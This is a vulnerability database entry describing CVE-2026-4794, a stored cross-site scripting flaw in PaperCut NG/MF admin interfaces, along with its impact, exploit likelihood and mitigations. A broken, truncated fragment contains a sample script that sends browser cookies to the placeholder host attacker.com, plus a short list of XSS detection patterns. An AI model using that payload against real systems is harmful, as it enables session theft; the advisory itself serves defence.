
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-4794 describes multiple stored cross-site scripting (XSS) vulnerabilities in PaperCut NG and PaperCut MF print management software affecting all versions before 25.0.10. Authenticated administrator users can inject arbitrary web script or HTML code via various UI fields in the admin interface, potentially compromising other administrators' sessions or enabling unauthorized actions within an authenticated context. The vulnerability was published on March 31, 2026, with a patch released in version 25.0.10. It carries a CVSS v3.1 base score of 4.8 (Medium) and a CVSS v4.0 base score of 2.1 (Low) (GitHub Advisory, PaperCut Bulletin).
The root cause is improper neutralization of user-controllable input before it is rendered in web pages served to other users (CWE-79). Multiple UI fields within the PaperCut NG/MF administrator interface fail to sanitize input, allowing a malicious administrator to store crafted JavaScript or HTML payloads that execute in the browser context of other administrators who subsequently view the affected pages. Exploitation requires the attacker to already hold valid administrator credentials and the attack requires passive user interaction from a victim administrator (i.e., the victim must view the page containing the injected payload). No public proof-of-concept exploit code has been identified (GitHub Advisory, PaperCut Bulletin).
Successful exploitation allows an attacker with administrator-level access to hijack other administrators' authenticated sessions, perform unauthorized administrative actions on their behalf, or exfiltrate session tokens and sensitive configuration data visible within the admin UI. The scope is changed (subsequent system impact), meaning the injected script executes in the browser context of other administrators rather than just the attacker's own session, resulting in low confidentiality and low integrity impacts on the subsequent system. Availability is not directly impacted, and exploitation is constrained to the administrative interface (GitHub Advisory, PaperCut Bulletin).
There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation as of the time of publication. The EPSS score is approximately 0.044% (4th percentile), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is significantly constrained by the requirement for existing administrator credentials and passive interaction from a victim administrator (GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into one or more vulnerable UI fields and save the configuration.<script>, onerror=, javascript:).PaperCut has released a patch in PaperCut NG/MF version 25.0.10; organizations should upgrade immediately (PaperCut Bulletin). As interim mitigations, restrict administrator account access to the minimum number of trusted users and enforce strong authentication (e.g., MFA) for all admin accounts. Implementing a Content Security Policy (CSP) header on the PaperCut web interface can reduce the impact of any XSS payloads by restricting script execution to trusted sources. Monitor administrator accounts for suspicious activity and review audit logs for unexpected configuration changes.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."